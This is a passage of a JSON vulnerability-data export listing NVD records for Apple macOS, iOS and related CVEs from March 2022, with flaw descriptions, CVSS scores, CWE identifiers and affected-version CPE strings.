"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22661", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22661"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22661", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:14", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22614", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22614"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:12.3", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22614", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22614", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:macos:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:23:52", "description": "A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22597", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22597"], "modified": "2022-03-25T19:49:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22597", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:39", "description": "An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22656", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22656"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22656", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:17", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22626", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22626"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:macos:10.15.7", "cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22626", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22626", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:30", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22648", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22648"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22648", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:25:01", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application's permissions and access user data.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22650", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22650"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22650", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:12", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22613", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22613"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22613", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22613", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:46", "description": "A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22638", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22638"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22638", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:09", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22615", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22615"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:12.3", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22615", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22615", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:macos:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:17", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22627", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22627"], "modified": "2022-03-26T04:19:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22627", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22627", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:35", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22647", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22647"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:macos:10.15.7"], "id": "CVE-2022-22647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22647", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:18", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22617", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22617"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:macos:10.15.7", "cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22617", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22617", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", 